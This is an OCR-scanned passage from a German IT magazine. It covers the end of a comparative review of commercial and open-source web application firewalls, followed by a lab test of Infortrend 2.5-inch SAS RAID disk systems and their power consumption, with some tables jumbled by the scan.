browser des ahnungslosen Opfers, der im 
Hintergrund Anfragen an eine Webappli- 
kation stellt, an der sich das Opfer zuvor 
angemeldet hat. So könnte ein Angreifer 
beispielsweise durch Platzieren eines un- 
sichtbaren Bildes den Browser des Opfers 
heimlich dazu veranlassen, das Konto des 
authentifizierten Benutzers zu sperren. 


Forceful Browsing: Backup- und Entwick- 
lungsdateien (.bak, .old) oder interessante 
Verzeichnisse wie /admin und /login kön- 
nen Debugging-Informationen beziehungs- 
weise sensitive Daten der Applikations- 
logik preisgeben. 


der Marktübersicht sein. Leider wollte 
der Hersteller keine Testversion zur 
Verfügung stellen, da dies nur im Rah- 
men von konkreten Kundenprojekten 
vorgesehen ist. 


Fa Hyperguard 
© von Art of Defence 


Einer der jüngsten Anbieter auf dem 
WAF-Markt und der einzige deutsche 
ist die Regensburger Art Of Defence 
mit ihrem Produkt Hyperguard. Dessen 
Integrationsmöglichkeiten decken ein 
weites Spektrum ab. Hyperguard kann 
man als Modul innerhalb von IIS, ISA 
Server oder Apache wie auch als eigen- 
ständige Komponente einer Genuscreen 
Firewall Appliance oder eines Zeus 
Loadbalancer betreiben. In der Praxis 
bedeutet dies, dass Administratoren ty- 
pischerweise keine neuen Komponen- 
ten im Netz integrieren müssen, son- 
dern bestehende Server mit dem Modul 
erweitern. Die eigenständigen Appli- 
ances sind dagegen eher für neu auf- 
zubauende Infrastrukturen interessant. 

Die einzelnen Sicherheitsfunktio- 
nen binden sogenannte Handler an die 
Pfade einer Applikation. Der größte 
Aufwand in der Erstkonfiguration be- 
steht in diesem Fall darin, die richti- 
gen Handler auszuwählen, geeignet zu 
parametrisieren und an die Anwen- 
dung anzupassen. Zwar existieren Wi- 
zards, die bei der Parametrisierung der 
Handler helfen, jedoch decken sie nicht 
alle Anwendungsbereiche ab. Beispiels- 
weise muss der Administrator Blacklis- 
ten gegen Cross-Site Scripting selbst 
definieren. Zudem sind Ausnahme- 
regeln für Blacklisten auf Feldebene 
nur schwer umzusetzen. Mächtig ist die 
Funktion der Vererbung, sodass einmal 
getroffene Basiseinstellungen für wei- 
tere Applikationen wieder Verwendung 
finden können. 


ii Barracuda Networks’ 


Web Appl. Controller 


Ursprünglich schon 1999 als Anbieter 
von Content-Delivery-Produkten ge- 
startet (damals unter dem Namen Net- 
continuum) hat die WAF der Barracuda 
Networks ihre Wurzeln in Beschleu- 
nigungsfunktionen wie Caching, Com- 
pression oder SSL-Offloading. Schon 
früh erkannte der Hersteller die Be- 
deutung der Applikationssicherheit 
und ergänzte das Produkt um WAF- 
Funktionen. 
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Websicherheit 


Die Stärken dieser WAF liegen in 
der regelbasierten Policy sowie in der 
übersichtlichen Trennung der Policy 
in die Bereiche Web Firewall (globale 
Sicherheitseinstellungen), URL ACLs 
(Filterung von gültigen URLs) und Pa- 
rameter ACLs (Anwendung von Black- 
und Whitelists auf Parameter). Außer 
der eigentlichen Administration verein- 
facht das ebenfalls eine Policy Review 
durch die Revision oder einen externen 
Dienstleister. 

Durch die Übernahme von Netcon- 
tinuum durch Barracuda Networks 
befindet sich das Produkt derzeit im 
Umbruch. Das bisherige Administra- 
tions-GUI (Java) ersetzt eine Integration 
in Barracudas webbasierte Manage- 
mentplattform, die ab dem vierten 
Quartal 2008 als Version 7.0 zur Ver- 
fügung stehen soll. In diesem Zuge 
will der Anbieter die Produktpalette 
erweitern, sodass in Zukunft neben 
den leistungsfähigen Highend-Geräten 
solche mit geringerer Leistung für 
mittelgroße Einsatzbereiche zur Ver- 
fügung stehen. 


Breach Securitys 
Modsecurity 


Das einzige ernstzunehmende Open- 
Source-Produkt im Test ist Modsecuri- 
ty von Breach Security. Ivan Ristic ent- 
wickelte es in Eigenregie, bis er seine 
Arbeit Ende 2006 an die amerikanisch- 
israelische Breach Security verkaufte. 
Dies hat der Entwicklung jedoch kei- 
nesfalls geschadet. Im Gegenteil, der 
Urvater von Modsecurity ist immer 
noch aktiv an der Entwicklung beteiligt 
und kann durch die Übernahme von 
besseren Ressourcen sowie weiteren 
Entwicklern profitieren. Das Produkt 
ist nach wie vor als Open Source li- 
zenziert, jedoch bietet Breach Security 
professionelle Services und eine eigens 
auf Modsecurity angepasste Appliance 
an. Da die Mehrheit der heute aktiven 
Modsecurity-Installationen auf einem 
Apache-Modul basieren dürfte und die 
Appliance außer einem Logging und 
Reporting keine weiteren Funktionen 
als die Softwarevariante bereitstellt, 
wurde für diesen Artikel Letztere be- 
trachtet. 

Im Bereich Filterung und Angriffs- 
erkennung liefert Modsecurity ähnlich 
mächtige Blacklists wie die kommer- 
ziellen Hersteller und profitiert dabei 
von der großen Community. Abstriche 
sind eher im Bereich Konfiguration und 
Betrieb sowie der Eignung für große 
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WAF-Produkte im Vergleich 


Hersteller Art of Defence 
Produkt Hyperguard 
Website www.artofdefence.com 
Version 2.1 beta 
Produktform Software!’ 
Modelle n/a? 

maximaler SSI-Durchsatz n/a 

je Modell® 

Integration Plug-in 
redundanter Cluster active/active? 
Stateful Failover jod 

Interfaces je Modell n/a 

(ohne Mgmt.) 

Management Web-Interface 
Unterstützung XML-RPC nur DTD-Validierung 
Unterstützung SOAP nein 

Whitelists für URLs ja (RegEx) 
Whitelists für Parameternamen ja (RegEx) 
Whitelists für Parameterwerte ja (RegEx) 


Blacklists einsehbar ja! 
[1 


Aktualisierung von Blacklists manuel 
regelbasierte Policy ja 
dynamische Policy nein® 
Lernmodus nein 
Passivmodus ja (pro Applikation) 
Ausnahmeregeln eingeschränkt 
One Click Refinements nein 
Request Manipulation nein 

Policy Export//Import ja (global) 
Policy-Versionierung ja 

Schutz vor Datendiebstahl ja 
Unterdrückung von Fehlerseiten ja 
Cookie-Schutz Cookie Store 
URL Encryption ja 

DoS Protection nein 

HSM Support (Hersteller) n/a 

Load Balancing n/a® 
Caching n/a® 
Compression n/a 
External Authentication nya® 
SSL-Client-Zertifikat n/u® 


Barracuda Networks Breach Security 
Web Application Controller ModSecurity 
www.barracudanetworks.com www.modsecurity.org 
6.1 2.5.1 

Appliance Software! 

NC500, NC1100, NC2000 n/a 

2000 tps (NC500), 9000 tps n/a 

(NCI100), 16000 tps (NC2000) 

Reverse Proxy, Transparent Plug-in 

Proxy, Bridge 

active/standby active//active® 

ja je 

2 x 1000 BASE (alle Modelle) n/a? 

ava GUN, CL! Textfile 

nein nur DTD-Validierung 
ja nein 

ja (Regex) ja (RegEx) 

ja (explizit) ja (RegEx) 

ja (Regex) ja (RegEx) 

ja ja 

bei Firmware-Upgrade/manuell manuell 

möglich 

ja ja 

ja (URLs und Formulare) nein 

ja nein 

ja (auf URI- oder Parameterebene) nein 


ja (auf URL- oder Parameterebene) 
a 
URI-Rewrite, Header-Rewrite/ 
nsert 

ja (auf Regelebene) 

nein 

ja 
ja 


ja (auf URI- oder Parameterebene) 
nein 

URI-Rewrite, Header-Rewrite/ 
nsert 

ja (auf Regelebene) 

extern (z.B. RCS) 


Verschlüsselung, Signierung nein 
nein nein 
ja ja 
nein n/a 
ja n/a 
ja (im RAM) n/a! 
ja n/a 
Radius, LDAP, RSA n/a! 
Benutzer zu WAF, WAF zu n/a! 
Webserver 


Anmerkung: Bewertet wurden Funktionen, die im GUI zur Verfügung stehen und keines manuellen Eingriffs am System bedürfen (z.B. Editieren von Konfigdateien, 
T siehe Text, ? auch als Soft-Appliance, allerdings eingeschränkter Hardware-Support, ? je nach gewählter Hardware,“ gilt für Modulversion, 


Enterprise-Umgebungen zu sehen. Poli- 
cies müssen Administratoren von Hand 
erstellen, Management- und Reporting- 
GUIs sind zwar in der Entwicklung, 
aber in der Praxis noch nicht sinnvoll 
nutzbar. Eigenschaften wie One Click 
Refinements oder Lernmodus fehlen 
ebenso wie weiterreichende Sicherheits- 
Features wie URL-Verschlüsselung, dy- 
namische Policies oder Cookie-Schutz. 

Modsecurity richtet sich daher eher 
an den erfahrenen Administrator klei- 
ner bis mittlerer Umgebungen, der sich 
nicht davor scheut, bei Schwierigkeiten 
direkt an der Konsole einzugreifen. In 


großen Umgebungen, in denen Prozes- 
se und Skalierbarkeit im Vordergrund 
stehen, findet man Modsecurity eher 
selten vor. 


Citrix’ Netscaler 
Application Firewall 


Große Player wie Citrix haben das 
Marktpotenzial der WAFSs ebenfalls er- 
kannt. Ende 2005 übernahm Citrix die 
ehemalige Teros und hat deren WAF 
in die eigene Netscaler-Architektur in- 
tegriert, sodass Anwender dort WAF- 
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Citrix 
Netscaler 
www.citrix.com 
8.0 

Appliance 


7000, 9000, 10000, 12000 
4400 tps (7000/9000), 8800 ps 
(10000), 28800 tps (12000) 


Reverse Proxy, Transparent 

Proxy, Bridge 

active/standby 

ja 

2 x 1000 BASE-T und 6 x 100 
BASET (7000), 4 x GBit SFP oder 
1000 BASE-T (9000), 4 x GBit SFP 
und 4 x 1000 BASE-T (10000), 

8 x GBit SFP (12000) 
Web-Interface 

nein 

nein 

ja (Regex) 

ja (Regex) 

ja (Regex) 

nein 

bei Firmware-Upgrade 


ja 
ja 
ja 
ja (auf Filterebene ) 


ja (auf URL- oder Parameterebene) 
nein 

URL-Rewrite, Header-Rewrite/ 
nsert 

ja (global) 

nein 

ja 
nein 

Signierung 

nein 

ja 

ja (Cavium) 

ja 

ja (im RAM) 

ja 

Radius, LDAP, AD, Tacacs, RSA 
Benutzer zu WAF, WAF zu 
Webserver 


F5 

BigIP ASM 
www.f5.com 
9.4.3 
Appliance 


6400, 6800, 8400, 8800 

15000 tps (6400), 20000 tps 
(6800), 22000 tps (8400), 
48000 tps (8800) 

Reverse Proxy, Transparent 

Proxy 

active/standby 

ja 

16 x 1000 BASE-TX und 4 x GBIC 
Mini (6400/6800), 12 x 1000 
BASE-TX oder 12 X GBIC Mini und 
2x 10 6Bit XFP (8400/8800) 


Web-Interface 

ja 

ja 

ja (Wildcards) 

ja (Wildcards) 

ja (Regex) 

ja 

automatisch (online) 


ja 

nein 

ja 

ja (pro Applikation) 


ja (auf URL- oder Parameterebene) 
ja 

URL-Rewrite, Header-Rewrite/ 
Insert? 

ja (auf Applikationsebene) 

ja 

ja 

ja 

Signierung 

nein 

ja 

ja (nCipher) 

ja 

ja (im RAM) 

ja 

Radius, LDAP, AD, Tacacs, RSA 


Benutzer zu WAF, WAF zu 
Webserver 


Imperva 
Securesphere 
Www.imperva.com 
6.0 

Appliance 


64, 68, 616 
16000 tps (64), 24000 tps (68), 
36000 tps (616) 


Bridge, Reverse Proxy, 
Transparent Proxy! 
active/active® 

nein? 


4.(64), 8 (68), 16 (616) 


Web-Interface 

ja 

ja 

ja (Wildcards) 

ja (explizit) 

ja (Regex) 

ja 

automatisch (online) 
i! 

nein 

ja 

ja (pro Applikation) 


ja (auf URL- oder Parameterebene) 
ja 
nein 


ja (auf Applikationsebene) 
nein 

ja 

ja 

ja 

nein 

ja 

ja (Safenet) 
nein 

nein 

nein 

nein 

nein 


Protegrity Visonys 

Defionce TMS Airlock 

www.protegrity.com www. visonys.com 

4.3 4.1 

Software (Solaris SPARC, Soft Appliance (Solaris Sparc 
Windows, Linux)? und Solaris X86) 

n/a n/a 

n/a? n/a 


Reverse Proxy, Transparent 
Proxy 


Reverse Proxy 


active//active® active/standby 
ja? nein® 

n/a? n/a 

ava-GUl Web-Interface 
ja ja 

ja ja 

ja (Regex) ja (Regex) 

ja (Regex) ja (RegEx) 

ja (RegEx) ja (Regex) 
nein ja 


bei Firmware-Upgrade 


ja 
nein 
ja 
ja (auf Filterebene) 


ja (auf URI- oder Parameterebene) 
ja 
Header-Insert 


bei Firmware-Upgrade 


ja 

nein 

nein 

ja (pro Applikation) 


ja (auf URI- oder Parameterebene) 
nein 
nein (siehe Anm.) 


ja (auf Applikationsebene) ja (global) 

nein nein 

ja ja 

ja ja 

Verschlüsselung Cookie Store, Verschlüsselung 

nein ja 

nein ja 

nein ja (Safenet) 

ja ja 

nein nein (Disk)? 

nein ja 

nein Radius, LDAP, AD, RSA 

Benutzer zu WAF Benutzer zu WAF, WAF zu 
Webserver 


Funktionen einfach nachlizenzieren 


können. 

Das Produkt kann flexibel mit regel- 
basierter und dynamischer Policy einge- 
setzt werden. Leider ist die Portierung 
aller Funktionen der Teros-Software in 
die Netscaler Plattform noch nicht ab- 
geschlossen. So fehlen immer noch die 
Unterstützung von SOAP oder XML- 
RPC. Citrix hat jedoch große Pläne mit 
der WAF-Technik. Neben den ohnehin 
schon leistungsfähigen Systemen der 
12000er-Plattform sollen in Zukunft 
noch größere Systeme hinzukommen, 
die für den Einsatz bei Service-Provi- 
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dern vorbereitet sind und eine Vielzahl 
an virtuellen Instanzen auf demselben 
System erlauben. 


= F5 BigIP Application 
Security Manager 


Ebenso wie Citrix hat F5 die WAF- 
Kompetenz zugekauft. Schon 2005 
übernahm F5 das Produkt Traffic- 
shield des Herstellers Magnifire. Heu- 
te bietet F5 es in stark überarbeiteter 
und verbesserter Form als Application 
Security Manager (ASM) innerhalb 


der BigIP-Loadbalancer-Familie an 
(siehe [1]). 

Die große Stärke des ASM ist die In- 
tegration in die bestehenden F5 Loadba- 
lancer, sodass sich eine Konsolidierung 
von WAF und Loadbalancer aufdrängt, 
wenngleich der Zusammenschluss im 
GUI noch nicht perfekt erscheint und 
der Einsteiger mit vielen Optionen kon- 
frontiert wird. Viele der Funktionen, 
die den WAF-Administrator unterstüt- 
zen (beispielsweise URL- oder Header- 
Manipulationen) kennt die BigIP-Platt- 
form schon seit Jahren in Form der 
sogenannten iRules, einer integrierten, 
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Websicherheit 


TCL-basierten Skriptsprache. Einmal 
gelernt, erlaubt diese Sprache vielfälti- 
ge Manipulationen oder Änderungen an 
Anfragen, was sogar Programmfluss- 
strukturen wie Schleifen oder konditio- 
nale Abfragen einschließt. 

Als einziges Produkt am Markt bietet 
das ASM Unterstützung für sogenann- 
te Flows. Sie sind nichts anderes als ein 
fest vorgegebener Weg durch eine Ap- 
plikation. Beispielsweise könnte im 
Checkout-Prozess eines Onlineshops 
vorgegeben sein, dass der Anwender 
auf Seite 1 seinen Warenkorb füllt, auf 
Seite 2 seine Kreditkarteninformationen 
angibt und auf Seite 3 eine Versand- 
adresse. Das ASM könnte in diesem 
Fall sicherstellen, dass niemand von der 
ersten auf die dritte springt und dadurch 
die Eingabe wichtiger Daten übergeht. 
Ein aus Sicherheitssicht nützliches Fea- 
ture, wenngleich es in der Praxis nur 
selten zum Einsatz kommt. Zu groß ist 
der Aufwand, sämtliche Navigations- 
pfade durch die Applikation in der Po- 
licy zu hinterlegen und vor allem im 
Falle von Änderungen zu pflegen. 


Impervas 


B Securesphere 


Mit Securesphere bietet Imperva eines 
der wenigen Produkte, das nicht nur Si- 
cherheit auf HTTP-Protokollebene bie- 
tet, sondern auf die gleiche Weise 
SQL-Datenströme ins Backend auf An- 
griffe oder Anomalien hin untersucht. 
Diese Funktion stand zwar nicht im Fo- 
kus dieses Tests, ermöglicht aber inter- 
essante Analysemöglichkeiten, wenn 
man einen Angriff beispielsweise da- 
durch klassifizieren will, dass ein po- 
tenzieller Angriffsversuch durchgängig 
atypisches Verhalten sowohl auf der 
Frontend-HTTP-Verbindung als auch 
auf der Backend-SQL-Kommunikation 
zeigen muss. 

Im reinen HTTP-Einsatz kann Se- 
curesphere ebenfalls interessante An- 
sätze aufweisen. Die Grundidee lautet: 
„Zero Administration“. Im Unterschied 
zu allen anderen Produkten startet der 
Administrator nicht mit der Konfigura- 
tion einer Policy, sondern bringt das 
System erst einmal direkt in den Daten- 
strom. Hierbei leistet die Bridge-Inte- 
gration gute Dienste, da keine IP- oder 
Routing-Änderungen nötig sind. Direkt 
mit den ersten Datenpaketen, die das 
System passieren, startet der Lernpro- 
zess, und Securesphere beginnt, aus 
den Daten ein detailliertes Regelwerk 
zu erstellen. Ausgeklügelte Heuristiken 
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erkennen, wann genügend Daten gelernt 
sind und die Policy aktiv geschaltet 
werden kann. Das Lernen geht sogar so 
weit, dass das System die Policy auto- 
matisch anpasst, wenn es eine Änderung 
an der Webapplikation erkannt hat. 

Der Gedanke der Zero Administra- 
tion ist bei Imperva sicherlich am wei- 
testen fortgeschritten, wenngleich der 
eine oder andere IT-Verantwortliche 
vielleicht ein ungutes Gefühl bekommt, 
da er seine bisherige Denkweise in 
den festgelegten Change-Prozessen der 
ITIL-Welt (IT Infrastructure Library) 
anpassen muss. 


Defiance 
= TMS von Protegrity 


Diese WAF war neben dem mittlerwei- 
le nicht mehr weiterentwickelten App- 
shield von Sanctum eines der ersten 
Produkte auf dem europäischen Markt, 
damals noch unter dem Produktnamen 
Interdo des Herstellers Kavado. Sie ist 
eine der wenigen verbliebenen reinen 
Softwarelösungen am Markt und wird 
häufig dann eingesetzt, wenn außer 
HTTP XML-RPC oder SOAP im Fo- 
kus stehen. 

Bei der Konfiguration des Systems 
setzt der Administrator sogenannte Se- 
curity Filter ein und wendet sie auf die 
einzelnen Bereiche (URLs) einer Web- 
applikation an. So können beispiels- 
weise im geschlossenen, besonders sen- 
siblen Bereich einer Webapplikation 
andere Filter aktiv sein als im Öffent- 
lichen Bereich. Den einzelnen Filtern 
sind bestimmte Sicherheitsfunktionen 
zugeordnet. So gibt es beispielsweise 
solche, die vor SQL Injection schützen, 
Whitelists für URLs definieren oder die 
Integrität von Session-Informationen si- 
cherstellen. Defiance TMS kombiniert 
hierbei geschickt die Filter für HTTP- 
Angriffe mit denen für XML-Angrif- 
fe: Durch eine Verkettung mehrerer Fil- 
ter kann beispielsweise derselbe Filter 
gegen SQL Injection für HTTP und 
XML dienen. Dies ist ein wichtiger Un- 
terscheidungspunkt, da viele andere Pro- 
dukte im XML-Bereich eher dürftige 
Filter einsetzen. 


© Visonys’ Airlock 


Safe and Swiss, so bewirbt Visonys ihr 
durch und durch schweizerisches WAF- 
Produkt, den Airlock. Die Geschichte 
reicht bis ins Jahr 1996 zurück, als die 
Credit Suisse Technik zur Absicherung 


von Onlinebanking-Systemen entwi- 
ckelte. Später spaltete sich daraus ein 
eigenes IT-Security-Unternehmen ab, 
und so steht der Airlock von Visonys 
heutzutage jedem Interessenten offen. 

Die Wurzeln im Bankenumfeld 
merkt man dem Airlock schnell an. 
Hier zählt nicht so sehr höchste Perfor- 
mance, sondern vielmehr sind flexible 
Anbindungen an externe Systeme, bei- 
spielsweise zur Authentifizierung bei 
Hostsystemen, Ausstellung von Secu- 
rity Token oder die Sicherstellung von 
Session-Integrität von höchster Bedeu- 
tung. Airlock stellt daher mehrere APIs 
zur Verfügung (ICAP, Java Servlet) und 
kann somit nicht nur als WAF, sondern 
auch als vollwertiger Authentifizie- 
rungs-Proxy dienen. Die Tomcat En- 
gine kann bei speziellen Anforderun- 
gen eigene Applikationen realisieren, 
die Anfragen inspizieren oder manipu- 
lieren. Selbst die Standardfunktionen 
des Systems sind mit den anderen Pro- 
dukten vergleichbar, sodass Java-Kennt- 
nisse nur für Spezialfälle erforderlich 
sind. 


Fazit 


Der Vergleich der aktuellen WAF-Pro- 
dukte zeigt, dass der Markt reifer gewor- 
den ist. Nützliche Features schauen die 
Hersteller untereinander ab, sodass sich 
die Produkte in ihrem Funktionsumfang 
annähern. Die Technik ist mittlerweile 
stabil genug, um selbst in großen Enter- 
prise-Umgebungen zum Einsatz kom- 
men zu können. Dennoch sind WARS in 
der Praxis immer noch selten im Ein- 
satz, obgleich sie aufgrund ihrer durch- 
gängig hohen Schutzwirkung klassische 
Sicherheitsmaßnahmen wie Pentests 
(Kurzform für Penetrationstests) oder 
die Etablierung von Standards zur siche- 
reren Programmierung bei vergleichs- 
weise geringem Aufwand wirkungsvoll 
unterstützen können. (hb) 


MICHAEL DIPPER, ANDREAS KURTZ 


sind Security Consultants bei der 
Cirosec GmbH in Heilbronn. 
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Speichersysteme 


Erste 2,5-Zoll-SAS-Disk-Systeme im Test 


Kleinkaliber 


Susanne Nolte 


Strom- und platzsparend: Das versprechen sich die 
Konzeptoren und Analysten von der nächsten Generation der 
Disk-Subsysteme durch den Umstieg auf 2,5"-Festplatten. 
Infortrend hat die ersten Modelle auf den Markt gebracht. 


Is erster Anbieter hat Infortrend 
Ars mit 2,5"-SAS- 

Platten vorgestellt. Durch den 
kleinen Formfaktor passen zwei Hori- 
zontalreihen aus je sechs Frontein- 
schüben samt SAS-Festplatten in die 
1-U-Chassis. Das soll nicht nur Platz, 
sondern auch Strom sparen. 

Ins iX-Labor kamen ein RAID-Sys- 
tem Eonstor BI2F-R1430 fürs SAN 
mit zwei Fibre-Channel-Controllern, 
jeder bestückt mit zwei 4-GBit-Inter- 
connects, seriellem und LAN-Manage- 
ment-Port sowie einem SAS-Erweite- 
rungsanschluss für JBODs. Mit den 
internen Platten kommunizieren sie über 
die SAS-Backplane. 

Fast identisch ist das SAS-RAID 
Eonstor B12S-R1030, das statt der FC- 
Anschlüsse vier 12 GBit/s schnelle Mi- 
ni-SAS-Host-Ports (x4) mitbringt und 
sich damit direkt an einen, maximal 
zwei Server (Dualhost) anschließen 
lässt (Direct Attached Storage, DAS). 
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Wie das FC-to-SAS-System akzeptiert 
das SAS-to-SAS-System ausschließlich 
2,53"-SAS-Platten. 

Dritter im Bunde war das SAS- 
JBOD (Just a Bunch of Disks) Eonstor 
B12S-J1000R, dessen 1-U-Chassis vor- 
ne ebenfalls mit 12 HD-Einschüben und 
auf der Rückseite mit zwei //O-Control- 
lern bestückt ist. Es kann entweder dem 
Fibre-Channel-to-SAS- oder dem SAS- 
to-SAS-System als Erweiterungseinheit 
dienen. Wer SAS und SATA gemischt 
haben will, muss stattdessen auf traditio- 
nelle 3,5"-SATA-JBOD zurückgrei- 
fen, mit denen sich beide RAID-Sys- 
teme ebenfalls betreiben lassen. 

Zum Ausbau der RAID-Systeme 
schließt man die Erweiterungs-Gehäuse 
(JBOD) - wie beim guten alten SCSI - 
im Daisy-Chain-Verfahren an. Dazu 
besitzt jeder JBOD-Controller einen 
Mini-SAS-,Eingang“ und einen „Aus- 
gang“ zum Anbinden weiterer JBODs. 
Bis zu drei JBODs verkraften die 


RAID-Systeme mit zwei Controllern, 
bis zu vier dürfen es sein, wenn sie nur 
einen Controller besitzen. 

Für die Paritätsberechnung der bei- 
den RAID-Systeme ist die Infortrend-ei- 
gene XOR-Engine ASIC400 zuständig, 
die die Level 0, 1,0+1, 10, 3, 30,5, 50, 
6 und 60 beherrscht. Als Cache dienen 
2x 512 MByte ECC-DDR-RAM, vor 
Datenverlust gesichert durch je einen 
Akku pro Controller. Zwei 380-Watt- 
Netzteile flankieren die /O-Module. Die 
Systemüberwachung der JBODs (Netz- 
teile, Lüfter, Temperatur) übernehmen 
die RAID-Systeme. Zu den drei Chas- 
sis lieferte Infortrend 20 SAS-Platten 
vom Typ Seagate Savvio 15SK SAS 
ST973451SS mit einer nominellen Ka- 
pazität von 73 GByte, 16 MByte Cache, 
3-GBit-SAS-Schnittstelle und 15 000 
Umdrehungen pro Minute. 

Mit den Savvio-Platten hat der Her- 
steller recht flotte Kandidaten für seine 
Systeme auserkoren: Jede Einzelne von 
ihnen liest mit gut 110 MBps (106Bytes/ 
s) oder 105 MByte/s (2”°Bytes/s) und 
schreibt mit ebenfalls satten 105 MBps 
(100 MByte/s). Selbst im hinteren Be- 
reich liefert sie noch 78,5 MBps (knapp 
75 MByte/s). 

Da die RAID-Sets immer einem 
Controller zugeordnet sind, während 
der zweite der Ausfallsicherheit dient, 
dürfte es zumindest beim 4-GBit-FC- 
System schwerfallen, ihnen den schwar- 
zen Peter des Flaschenhalses zuzuschie- 
ben. Beim SAS-System sieht das anders 
aus: Die 12 Gbps schnelle 4x-SAS- 
Verbindung zum Host können weder 
RAID-Engine noch RAID-Sets mit — 
normalerweise — weniger als 12 Platten 
in der Performance voll ausnutzen. Das 
macht sich aber sowieso erst bemerk- 
bar, wenn die ankommenden Daten 
die Cache-Größe überschreiten, die im 
Vollausbau bei 2 GByte liegen kann. 
Im Grenzbereich der Cache-Größe fällt 
das Fehlen von Performance-Schwan- 
kungen positiv auf. 


RAID in Bewegung 


Auch am Funktionsumfang wird deut- 
lich, dass Infortrend die Systeme gern 
bei Kunden mit gehobenen Ansprüchen 
platzieren möchte. Wie gehabt lassen 
sich die Mitglieder der RAID-Sets in 
ihren Einschüben vertauschen, da der 
Controller sie an ihrer RAID-ID erkennt 
und zuordnet. Zudem kann der Control- 
ler den RAID-Sets Platten hinzufügen 
(Add Drives), die Sets in den hinteren 
Plattenbereich hinein erweitern, wenn 
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Das SAS-to-SAS- (oben) und das FC-to-SAS-RAID-System (unten) unterscheiden 
sich lediglich in ihren Schnittstellen zum Host, das SAS-JBOD (Mitte) besitzt statt 
der Management- weitere SAS-Ports (Abb. 1). 


dort noch Platz ist (Expand Logical 
Drive), oder sie migrieren: von RAID6 
zu RAID5 oder von RAIDS5 zu RAID6, 
so man eine Platte hinzufügt (Migrate 
Logical Drive). 

Dem Plattenausfall vorbeugen soll 
der Media Scan. Er lässt sich für ein- 
zelne Platten oder ganze RAID-Sets 
manuell oder per Task Scheduler mit 
unterschiedlichen Prioritäten starten. 
Ist Handlungsbedarf angezeigt, kann 
man je nach Fall die Paritätsblöcke er- 
neut errechnen und inkonsistente erset- 
zen lassen (Regenerate Parity), einen 
Copy and Replace eines RAID-Ver- 
bund-Mitglieds auf eine frische Platte 
anstoßen oder es auf ein Spare Drive 
klonen (Perpetual Clone oder Replace 
after Clone). 

Spare Drives lassen sich übrigens glo- 
bal, pro Chassis oder pro RAID-Set (Lo- 
gical Drive) definieren. Zusätzlich kann 
man den Rebuild händisch anstoßen. 

Bei den Messungen der Leistungs- 
aufnahme fällt auf, dass der Grundver- 
brauch der RAID-Systeme bereits bei 
jeweils knapp 200 Watt (voll bestückt) 
liegt, der unter Last nur um etwa 20 
Watt steigt. Selbst mit „ausgeschalte- 
ten“ Netzteilen ziehen die Systeme ihre 
8,1 Watt (45,4 VA). Besser wird der 
Cosinus Phi (hier noch 0,18), wenn die 
Netzteile unter Last stehen: Im Betrieb 
schwankt er — je nach Last — zwischen 
0,89 und 0,92. 


Ängström pro Woche 


Durch die 2,5"-Platten verlagert sich 
der Hauptverbrauch auf den hinteren 
Teil der Systeme: die /YO-Controller, 
Transceiver, RAID-Engines, Cache plus 
Batteriepuffer und Netzteile. Das FC- 
RAID beispielsweise zieht leer, also oh- 
ne HDs 118 Watt, voll bestückt (876 
GByte brutto), aber arbeitslos 192 Watt. 
Von den 74 Watt Differenz nimmt Sea- 
gate 69,6 auf seine Kappe - der Herstel- 
ler gibt idle 5,8 Watt pro Platte an —, die 
restlichen 4,4 Watt lassen sich getrost 
unter Backplane-Anbindung, Leucht- 
dioden und Messungenauigkeiten ver- 
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rechnen. Jedes weitere JBOD schlägt 
voll bestückt mit weiteren 143 Watt 
(leer etwa 70 Watt) zu Buche. 

Da die Hersteller ausgerechnet hier 
den Unterschied zu den 3,5"-Disksys- 
temen sehen, wäre ein genauer Blick 
angebracht: Zieht man zum Vergleich 
die äquivalenten 3,5"-Modelle dessel- 
ben Herstellers heran, landet man au- 
tomatisch bei der Cheetah 15K.5 SAS 
ST373455SS, ebenfalls ausgestattet mit 
73 GByte Kapazität, 16 MByte Cache, 
3-GBit-SAS-Schnittstelle und 15 000 
U/min. Sie verbraucht idle 8,4 Watt, 
was bei 12 Platten im Leerlauf 100,8 
Watt ergibt, also eine Differenz von 
gut 30 Watt. 

Allerdings unterscheiden sich 2,5"- 
und 3,5"-Platten nach wie vor an einem 
für Storage-Systeme nicht unwichtigem 
Punkt: der Kapazität. Die aktuelle Ge- 
neration der 3,5"-Enterprise-SAS-Plat- 
ten Cheetah 15K.6 fasst 450 GByte 
(12,4 Watt idle), 300 GByte (11,1 
Watt) oder 146 GByte (9,6 Watt). Will 
man mit den 2,5"-Platten in der Kapa- 
zität höher hinaus, muss man zu den 
mit 10 000 U/min langsamer drehen- 
den HDs greifen, deren größte momen- 
tan 146 GByte fasst. Die beanspruchen 
in der aktuellen Generation (Savvio 
10K.2 SAS) durch den langsameren 
Motor 5,2 Watt - einziges 3,5"-SAS- 
Gegenstück von Seagate ist die Chee- 
tah NS mit 400 GByte und ganzen 8,1 
Watt Leistungshunger. 

Benötigt man beispielsweise 5 TByte, 
sollte ein einzelnes 2 U hohes RAID- 
System mit zwölf 15000 U/min schnel- 
len 450-GByte-Platten (5,4 TByte brut- 
to) unter Umständen genügsamer im 
Stromverbrauch sein als eines mit zwölf 
2,5"-Platten a 146-GByte und 10 000 
Upm samt den zwei Erweiterungsein- 


© performant 
© komfortable RAID-Verwaltung 


© keine weiterführenden Features 


heiten mit weiteren 24 Platten. Womit 
auch der zweite Punkt — Platzersparnis 
— geklärt wäre. Nimmt man nicht die 
Anzahl der Festplatten als Vergleichs- 
wert, also 4 versus 12 HDs bei einer 
Höheneinheit respektive 12 versus 24 
HDs bei zwei, sondern die Kapazität, 
sieht die Rechnung auch hier anders 
aus: 1,8 zu 1,75 TByte auf I U oder 5,4 
zu 3,5 TByte auf2 U. 


Fazit 


Insgesamt sind die neuen Infortrend- 
RAIDs gut zu handhabende und schnell 
arbeitende SAS-Disk-Systeme, die zwar 
ohne sogenannte Enterprise-Features 
wie Snapshots oder Remote-Copy aus- 
kommen müssen, aber in kleineren 
Umgebungen nur wenige Wünsche of- 
fen lassen. Einzig das 2,5"-Strom- und 
Platzsparargument der Hersteller ist 
momentan noch eine Milchmädchen- 
rechnung. Ob sich das ändert, wird die 
weitere Entwicklung der 2,5"- und 
3,5"-Platten entscheiden. Zumindest ei- 
nes haben die 2,5"-Systeme für sich: 
Da die sich Festplattenhersteller mittel- 
fristig vom größeren Formfaktor verab- 
schieden wollen, ist man mit ihnen für 
die Zukunft gerüstet. (sun) 


Datenund Preise 


Eonstor BI12F-R1430: 


FC-to-SAS-RAID-System; I U; 12 2,5"-SAS-Ein- 
schübe; Frontdisplay; 2 FC-to-SAS-Controller 
